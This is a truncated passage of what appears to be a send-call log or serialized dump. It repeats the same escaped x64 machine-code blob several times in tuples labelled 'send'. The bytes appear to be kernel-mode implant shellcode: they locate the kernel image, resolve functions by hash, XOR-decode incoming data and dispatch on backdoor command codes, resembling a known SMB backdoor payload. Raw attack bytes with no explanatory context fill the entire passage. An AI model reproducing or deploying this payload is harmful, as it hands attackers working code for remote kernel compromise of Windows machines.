\\x18f\\\\x81\\\\xfbMZt\\\\x08H-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xee[\\\\xc3WVQH1\\\\xffH\\\\x89\\\\xc6H1\\\\xc0\\\\x8b\\\\x04\\\\xbaH\\\\x01\\\\xf0\\\\xe8@\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x0eH\\\\xff\\\\xc7H9\\\\xdft\\\\x0b\\\\xeb\\\\xe4Y^_\\\\xc3H\\\\x89\\\\xf8\\\\xeb\\\\xf7H1\\\\xc0\\\\xeb\\\\xf2VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA\\\\x1cH\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA 
H\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA$H\\\\x01\\\\xf0^\\\\xc3H\\\\xd1\\\\xe1H\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3H\\\\x81\\\\xca\\\\x00\\\\x00\\\\xff\\\\xffH\\\\x81\\\\xf2\\\\x00\\\\x00\\\\xff\\\\xffH\\\\xc1\\\\xe2\\\\x02H\\\\x01\\\\xd1H1\\\\xd2\\\\x8b\\\\x11H\\\\x01\\\\xd0\\\\xc3WVSUATAUAVAWI\\\\x89\\\\xe4H\\\\x81\\\\xec\\\\x08\\\\x01\\\\x00\\\\x00I\\\\x89\\\\xcfH\\\\x8d-\\\\xe0\\\\xff\\\\xff\\\\xfff\\\\x81\\\\xe5\\\\x00\\\\xf0H\\\\x89MXH1\\\\xd2f\\\\x8bQ\\\\x02H\\\\x01\\\\xcaH;\\\\x11t\\\\x06H\\\\x8dI\\\\x08\\\\xeb\\\\xf5H\\\\x8dA(H\\\\x89E4H\\\\x8bA\\\\xf0H\\\\x89E(\\\\xe8(\\\\x01\\\\x00\\\\x00\\\\xe8{\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xed\\\\x00\\\\x00\\\\x00L\\\\x8bm<A\\\\x8bM\\\\xbc\\\\xe8\\\\xf9\\\\x00\\\\x00\\\\x00<#t\\\\r<wt\\\\x1d<\\\\xc8t#\\\\xe9\\\\xbd\\\\x00\\\\x00\\\\x00H\\\\x8bM(\\\\x8bED\\\\x89A\\\\x0e\\\\xb0\\\\x01\\\\x88A\\\\x12\\\\xe9\\\\xa5\\\\x00\\\\x00\\\\x00\\\\xe8\\\\xf4\\\\x00\\\\x00\\\\x00\\\\xe9\\\\x9b\\\\x00\\\\x00\\\\x00H1\\\\xdbH1\\\\xf6H1\\\\xffI\\\\x8bE\\\\xd8\\\\x8b\\\\x18\\\\x8bp\\\\x04\\\\x8bx\\\\x08\\\\x8bMH1\\\\xcb1\\\\xce1\\\\xcfA;u\\\\x10u{;]TH\\\\x8bELt\\\\x16\\\\xe8\\\\xd1\\\\x00\\\\x00\\\\x00H\\\\x8dS\\\\x04H1\\\\xc9\\\\xffU\\\\x10H\\\\x89EL\\\\x89]TH\\\\x85\\\\xc0t[H\\\\x01\\\\xf7H9\\\\xdfwOH)\\\\xf7H\\\\x01\\\\xc7WH\\\\x89\\\\xf1QI\\\\x8bu\\\\xe8\\\\xf3\\\\xa4YH\\\\xc1\\\\xe9\\\\x02^\\\\x8bUH1\\\\x16H\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf8H\\\\x01\\\\xd8H9\\\\xc6|!\\\\xffUL\\\\xe8\\\\x81\\\\x00\\\\x00\\\\x00\\\\x8bED\\\\xd1\\\\xe8H1\\\\xc9\\\\x88\\\\xc1H\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89ED\\\\xe8C\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00H\\\\x8bM(\\\\xb4\\\\x00f\\\\x01A\\\\x1eH\\\\x8bE 
L\\\\x89\\\\xf9L\\\\x89\\\\xe4A_A^A]A\\\\\\\\][^_\\\\xff`x1\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bED\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89EHY\\\\xc3Q\\\\xe8\\\\x0e\\\\x00\\\\x00\\\\x00H\\\\x8bE H\\\\x8bHxH\\\\x89HpY\\\\xc3SWH\\\\x83\\\\xec(H\\\\x8b]LH\\\\x85\\\\xdbt\\\\x131\\\\xc0H\\\\x89\\\\xdfH1\\\\xc9\\\\x8bMT\\\\xf3\\\\xaaH\\\\x89\\\\xd9\\\\xffU\\\\x18H1\\\\xc0\\\\x89ETH\\\\x89ELH\\\\x83\\\\xc4(_[\\\\xc3QVWH\\\\x8bu4H\\\\x8b\\\\x0e\\\\xe8H\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0u\\\\x11H\\\\x8dv\\\\x08H\\\\x8b\\\\x0e\\\\xe87\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0t+H\\\\x89M4j\\\\x0cXH\\\\x8d\\\\xb1\\\\x90\\\\x00\\\\x00\\\\x00;\\\\x06t\\\\x08H\\\\x83\\\\xc6\\\\x08;\\\\x06u\\\\x11;F\\\\x04u\\\\x0cH\\\\x89u<H1\\\\xc0H\\\\xff\\\\xc0\\\\xeb\\\\x03H1\\\\xc0_^Y\\\\xc3H1\\\\xc0H9\\\\xc1}\\\\x03H\\\\xff\\\\xc0\\\\xc3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 6, b'\\\\x89\\\\xecA_A^A]A\\\\\\\\^_][\\\\xc3SRQUH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x00\\\\x01\\\\x00\\\\x00WH\\\\x89\\\\xcfH\\\\x89\\\\xd8H\\\\x89\\\\x85\\\\x00\\\\xff\\\\xff\\\\xff\\\\xe8\\\\xbb\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8H\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x10\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x9a\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x18\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x8f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x84\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xf9H\\\\x8b\\\\x95 
\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x9d\\\\x10\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x0f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x850\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d0\\\\xff\\\\xff\\\\xff\\\\xe8U\\\\x01\\\\x00\\\\x00f\\\\x89\\\\xc2H\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x18\\\\xff\\\\xff\\\\xff\\\\xe8I\\\\x01\\\\x00\\\\x00_H\\\\x81\\\\xc4\\\\x00\\\\x01\\\\x00\\\\x00]YZ[\\\\xc3VWH1\\\\xf6\\\\x8bp<H\\\\x01\\\\xc6f\\\\x81>PEu\\\\x12H\\\\x81\\\\xc6\\\\x88\\\\x00\\\\x00\\\\x00H1\\\\xff\\\\x8b>H\\\\x01\\\\xf8_^\\\\xc3H1\\\\xc0\\\\xeb\\\\xf8VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x07\\\\x01\\\\xc8H\\\\xff\\\\xc6\\\\xeb\\\\xe7_Y^\\\\xc3VWRH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0H\\\\xff\\\\xc6\\\\xe2\\\\xecZ_^\\\\xc3VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\n\\\\x01\\\\xc8H\\\\xff\\\\xc6H\\\\xff\\\\xc6\\\\xeb\\\\xe4_Y^\\\\xc3VH\\\\x89\\\\xc6H\\\\x83\\\\xc6\\\\x18H1\\\\xc0\\\\x8b\\\\x06^\\\\xc3SeH\\\\x8b\\\\x04%8\\\\x00\\\\x00\\\\x00H\\\\x8b@\\\\x04H\\\\xc1\\\\xe8\\\\x0cH\\\\xc1\\\\xe0\\\\x0cH\\\\x8b\\\\x18f\\\\x81\\\\xfbMZt\\\\x08H-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xee[\\\\xc3WVQH1\\\\xffH\\\\x89\\\\xc6H1\\\\xc0\\\\x8b\\\\x04\\\\xbaH\\\\x01\\\\xf0\\\\xe8@\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x0eH\\\\xff\\\\xc7H9\\\\xdft\\\\x0b\\\\xeb\\\\xe4Y^_\\\\xc3H\\\\x89\\\\xf8\\\\xeb\\\\xf7H1\\\\xc0\\\\xeb\\\\xf2VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA\\\\x1cH\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA 
H\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA$H\\\\x01\\\\xf0^\\\\xc3H\\\\xd1\\\\xe1H\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3H\\\\x81\\\\xca\\\\x00\\\\x00\\\\xff\\\\xffH\\\\x81\\\\xf2\\\\x00\\\\x00\\\\xff\\\\xffH\\\\xc1\\\\xe2\\\\x02H\\\\x01\\\\xd1H1\\\\xd2\\\\x8b\\\\x11H\\\\x01\\\\xd0\\\\xc3WVSUATAUAVAWI\\\\x89\\\\xe4H\\\\x81\\\\xec\\\\x08\\\\x01\\\\x00\\\\x00I\\\\x89\\\\xcfH\\\\x8d-\\\\xe0\\\\xff\\\\xff\\\\xfff\\\\x81\\\\xe5\\\\x00\\\\xf0H\\\\x89MXH1\\\\xd2f\\\\x8bQ\\\\x02H\\\\x01\\\\xcaH;\\\\x11t\\\\x06H\\\\x8dI\\\\x08\\\\xeb\\\\xf5H\\\\x8dA(H\\\\x89E4H\\\\x8bA\\\\xf0H\\\\x89E(\\\\xe8(\\\\x01\\\\x00\\\\x00\\\\xe8{\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xed\\\\x00\\\\x00\\\\x00L\\\\x8bm<A\\\\x8bM\\\\xbc\\\\xe8\\\\xf9\\\\x00\\\\x00\\\\x00<#t\\\\r<wt\\\\x1d<\\\\xc8t#\\\\xe9\\\\xbd\\\\x00\\\\x00\\\\x00H\\\\x8bM(\\\\x8bED\\\\x89A\\\\x0e\\\\xb0\\\\x01\\\\x88A\\\\x12\\\\xe9\\\\xa5\\\\x00\\\\x00\\\\x00\\\\xe8\\\\xf4\\\\x00\\\\x00\\\\x00\\\\xe9\\\\x9b\\\\x00\\\\x00\\\\x00H1\\\\xdbH1\\\\xf6H1\\\\xffI\\\\x8bE\\\\xd8\\\\x8b\\\\x18\\\\x8bp\\\\x04\\\\x8bx\\\\x08\\\\x8bMH1\\\\xcb1\\\\xce1\\\\xcfA;u\\\\x10u{;]TH\\\\x8bELt\\\\x16\\\\xe8\\\\xd1\\\\x00\\\\x00\\\\x00H\\\\x8dS\\\\x04H1\\\\xc9\\\\xffU\\\\x10H\\\\x89EL\\\\x89]TH\\\\x85\\\\xc0t[H\\\\x01\\\\xf7H9\\\\xdfwOH)\\\\xf7H\\\\x01\\\\xc7WH\\\\x89\\\\xf1QI\\\\x8bu\\\\xe8\\\\xf3\\\\xa4YH\\\\xc1\\\\xe9\\\\x02^\\\\x8bUH1\\\\x16H\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf8H\\\\x01\\\\xd8H9\\\\xc6|!\\\\xffUL\\\\xe8\\\\x81\\\\x00\\\\x00\\\\x00\\\\x8bED\\\\xd1\\\\xe8H1\\\\xc9\\\\x88\\\\xc1H\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89ED\\\\xe8C\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00H\\\\x8bM(\\\\xb4\\\\x00f\\\\x01A\\\\x1eH\\\\x8bE 
L\\\\x89\\\\xf9L\\\\x89\\\\xe4A_A^A]A\\\\\\\\][^_\\\\xff`x1\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bED\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89EHY\\\\xc3Q\\\\xe8\\\\x0e\\\\x00\\\\x00\\\\x00H\\\\x8bE H\\\\x8bHxH\\\\x89HpY\\\\xc3SWH\\\\x83\\\\xec(H\\\\x8b]LH\\\\x85\\\\xdbt\\\\x131\\\\xc0H\\\\x89\\\\xdfH1\\\\xc9\\\\x8bMT\\\\xf3\\\\xaaH\\\\x89\\\\xd9\\\\xffU\\\\x18H1\\\\xc0\\\\x89ETH\\\\x89ELH\\\\x83\\\\xc4(_[\\\\xc3QVWH\\\\x8bu4H\\\\x8b\\\\x0e\\\\xe8H\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0u\\\\x11H\\\\x8dv\\\\x08H\\\\x8b\\\\x0e\\\\xe87\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0t+H\\\\x89M4j\\\\x0cXH\\\\x8d\\\\xb1\\\\x90\\\\x00\\\\x00\\\\x00;\\\\x06t\\\\x08H\\\\x83\\\\xc6\\\\x08;\\\\x06u\\\\x11;F\\\\x04u\\\\x0cH\\\\x89u<H1\\\\xc0H\\\\xff\\\\xc0\\\\xeb\\\\x03H1\\\\xc0_^Y\\\\xc3H1\\\\xc0H9\\\\xc1}\\\\x03H\\\\xff\\\\xc0\\\\xc3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 7, b'\\\\x89\\\\xecA_A^A]A\\\\\\\\^_][\\\\xc3SRQUH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x00\\\\x01\\\\x00\\\\x00WH\\\\x89\\\\xcfH\\\\x89\\\\xd8H\\\\x89\\\\x85\\\\x00\\\\xff\\\\xff\\\\xff\\\\xe8\\\\xbb\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8H\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x10\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x9a\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x18\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x8f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x84\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xf9H\\\\x8b\\\\x95 
\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x9d\\\\x10\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x0f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x850\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d0\\\\xff\\\\xff\\\\xff\\\\xe8U\\\\x01\\\\x00\\\\x00f\\\\x89\\\\xc2H\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x18\\\\xff\\\\xff\\\\xff\\\\xe8I\\\\x01\\\\x00\\\\x00_H\\\\x81\\\\xc4\\\\x00\\\\x01\\\\x00\\\\x00]YZ[\\\\xc3VWH1\\\\xf6\\\\x8bp<H\\\\x01\\\\xc6f\\\\x81>PEu\\\\x12H\\\\x81\\\\xc6\\\\x88\\\\x00\\\\x00\\\\x00H1\\\\xff\\\\x8b>H\\\\x01\\\\xf8_^\\\\xc3H1\\\\xc0\\\\xeb\\\\xf8VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x07\\\\x01\\\\xc8H\\\\xff\\\\xc6\\\\xeb\\\\xe7_Y^\\\\xc3VWRH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0H\\\\xff\\\\xc6\\\\xe2\\\\xecZ_^\\\\xc3VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\n\\\\x01\\\\xc8H\\\\xff\\\\xc6H\\\\xff\\\\xc6\\\\xeb\\\\xe4_Y^\\\\xc3VH\\\\x89\\\\xc6H\\\\x83\\\\xc6\\\\x18H1\\\\xc0\\\\x8b\\\\x06^\\\\xc3SeH\\\\x8b\\\\x04%8\\\\x00\\\\x00\\\\x00H\\\\x8b@\\\\x04H\\\\xc1\\\\xe8\\\\x0cH\\\\xc1\\\\xe0\\\\x0cH\\\\x8b\\\\x18f\\\\x81\\\\xfbMZt\\\\x08H-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xee[\\\\xc3WVQH1\\\\xffH\\\\x89\\\\xc6H1\\\\xc0\\\\x8b\\\\x04\\\\xbaH\\\\x01\\\\xf0\\\\xe8@\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x0eH\\\\xff\\\\xc7H9\\\\xdft\\\\x0b\\\\xeb\\\\xe4Y^_\\\\xc3H\\\\x89\\\\xf8\\\\xeb\\\\xf7H1\\\\xc0\\\\xeb\\\\xf2VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA\\\\x1cH\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA 
H\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA$H\\\\x01\\\\xf0^\\\\xc3H\\\\xd1\\\\xe1H\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3H\\\\x81\\\\xca\\\\x00\\\\x00\\\\xff\\\\xffH\\\\x81\\\\xf2\\\\x00\\\\x00\\\\xff\\\\xffH\\\\xc1\\\\xe2\\\\x02H\\\\x01\\\\xd1H1\\\\xd2\\\\x8b\\\\x11H\\\\x01\\\\xd0\\\\xc3WVSUATAUAVAWI\\\\x89\\\\xe4H\\\\x81\\\\xec\\\\x08\\\\x01\\\\x00\\\\x00I\\\\x89\\\\xcfH\\\\x8d-\\\\xe0\\\\xff\\\\xff\\\\xfff\\\\x81\\\\xe5\\\\x00\\\\xf0H\\\\x89MXH1\\\\xd2f\\\\x8bQ\\\\x02H\\\\x01\\\\xcaH;\\\\x11t\\\\x06H\\\\x8dI\\\\x08\\\\xeb\\\\xf5H\\\\x8dA(H\\\\x89E4H\\\\x8bA\\\\xf0H\\\\x89E(\\\\xe8(\\\\x01\\\\x00\\\\x00\\\\xe8{\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xed\\\\x00\\\\x00\\\\x00L\\\\x8bm<A\\\\x8bM\\\\xbc\\\\xe8\\\\xf9\\\\x00\\\\x00\\\\x00<#t\\\\r<wt\\\\x1d<\\\\xc8t#\\\\xe9\\\\xbd\\\\x00\\\\x00\\\\x00H\\\\x8bM(\\\\x8bED\\\\x89A\\\\x0e\\\\xb0\\\\x01\\\\x88A\\\\x12\\\\xe9\\\\xa5\\\\x00\\\\x00\\\\x00\\\\xe8\\\\xf4\\\\x00\\\\x00\\\\x00\\\\xe9\\\\x9b\\\\x00\\\\x00\\\\x00H1\\\\xdbH1\\\\xf6H1\\\\xffI\\\\x8bE\\\\xd8\\\\x8b\\\\x18\\\\x8bp\\\\x04\\\\x8bx\\\\x08\\\\x8bMH1\\\\xcb1\\\\xce1\\\\xcfA;u\\\\x10u{;]TH\\\\x8bELt\\\\x16\\\\xe8\\\\xd1\\\\x00\\\\x00\\\\x00H\\\\x8dS\\\\x04H1\\\\xc9\\\\xffU\\\\x10H\\\\x89EL\\\\x89]TH\\\\x85\\\\xc0t[H\\\\x01\\\\xf7H9\\\\xdfwOH)\\\\xf7H\\\\x01\\\\xc7WH\\\\x89\\\\xf1QI\\\\x8bu\\\\xe8\\\\xf3\\\\xa4YH\\\\xc1\\\\xe9\\\\x02^\\\\x8bUH1\\\\x16H\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf8H\\\\x01\\\\xd8H9\\\\xc6|!\\\\xffUL\\\\xe8\\\\x81\\\\x00\\\\x00\\\\x00\\\\x8bED\\\\xd1\\\\xe8H1\\\\xc9\\\\x88\\\\xc1H\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89ED\\\\xe8C\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00H\\\\x8bM(\\\\xb4\\\\x00f\\\\x01A\\\\x1eH\\\\x8bE 
L\\\\x89\\\\xf9L\\\\x89\\\\xe4A_A^A]A\\\\\\\\][^_\\\\xff`x1\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bED\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89EHY\\\\xc3Q\\\\xe8\\\\x0e\\\\x00\\\\x00\\\\x00H\\\\x8bE H\\\\x8bHxH\\\\x89HpY\\\\xc3SWH\\\\x83\\\\xec(H\\\\x8b]LH\\\\x85\\\\xdbt\\\\x131\\\\xc0H\\\\x89\\\\xdfH1\\\\xc9\\\\x8bMT\\\\xf3\\\\xaaH\\\\x89\\\\xd9\\\\xffU\\\\x18H1\\\\xc0\\\\x89ETH\\\\x89ELH\\\\x83\\\\xc4(_[\\\\xc3QVWH\\\\x8bu4H\\\\x8b\\\\x0e\\\\xe8H\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0u\\\\x11H\\\\x8dv\\\\x08H\\\\x8b\\\\x0e\\\\xe87\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0t+H\\\\x89M4j\\\\x0cXH\\\\x8d\\\\xb1\\\\x90\\\\x00\\\\x00\\\\x00;\\\\x06t\\\\x08H\\\\x83\\\\xc6\\\\x08;\\\\x06u\\\\x11;F\\\\x04u\\\\x0cH\\\\x89u<H1\\\\xc0H\\\\xff\\\\xc0\\\\xeb\\\\x03H1\\\\xc0_^Y\\\\xc3H1\\\\xc0H9\\\\xc1}\\\\x03H\\\\xff\\\\xc0\\\\xc3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 8, b'\\\\x89\\\\xecA_A^A]A\\\\\\\\^_][\\\\xc3SRQUH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x00\\\\x01\\\\x00\\\\x00WH\\\\x89\\\\xcfH\\\\x89\\\\xd8H\\\\x89\\\\x85\\\\x00\\\\xff\\\\xff\\\\xff\\\\xe8\\\\xbb\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8H\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x10\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x9a\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x18\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x8f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x84\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xf9H\\\\x8b\\\\x95 
\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x9d\\\\x10\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x0f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x850\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d0\\\\xff\\\\xff\\\\xff\\\\xe8U\\\\x01\\\\x00\\\\x00f\\\\x89\\\\xc2H\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x18\\\\xff\\\\xff\\\\xff\\\\xe8I\\\\x01\\\\x00\\\\x00_H\\\\x81\\\\xc4\\\\x00\\\\x01\\\\x00\\\\x00]YZ[\\\\xc3VWH1\\\\xf6\\\\x8bp<H\\\\x01\\\\xc6f\\\\x81>PEu\\\\x12H\\\\x81\\\\xc6\\\\x88\\\\x00\\\\x00\\\\x00H1\\\\xff\\\\x8b>H\\\\x01\\\\xf8_^\\\\xc3H1\\\\xc0\\\\xeb\\\\xf8VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x07\\\\x01\\\\xc8H\\\\xff\\\\xc6\\\\xeb\\\\xe7_Y^\\\\xc3VWRH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0H\\\\xff\\\\xc6\\\\xe2\\\\xecZ_^\\\\xc3VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\n\\\\x01\\\\xc8H\\\\xff\\\\xc6H\\\\xff\\\\xc6\\\\xeb\\\\xe4_Y^\\\\xc3VH\\\\x89\\\\xc6H\\\\x83\\\\xc6\\\\x18H1\\\\xc0\\\\x8b\\\\x06^\\\\xc3SeH\\\\x8b\\\\x04%8\\\\x00\\\\x00\\\\x00H\\\\x8b@\\\\x04H\\\\xc1\\\\xe8\\\\x0cH\\\\xc1\\\\xe0\\\\x0cH\\\\x8b\\\\x18f\\\\x81\\\\xfbMZt\\\\x08H-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xee[\\\\xc3WVQH1\\\\xffH\\\\x89\\\\xc6H1\\\\xc0\\\\x8b\\\\x04\\\\xbaH\\\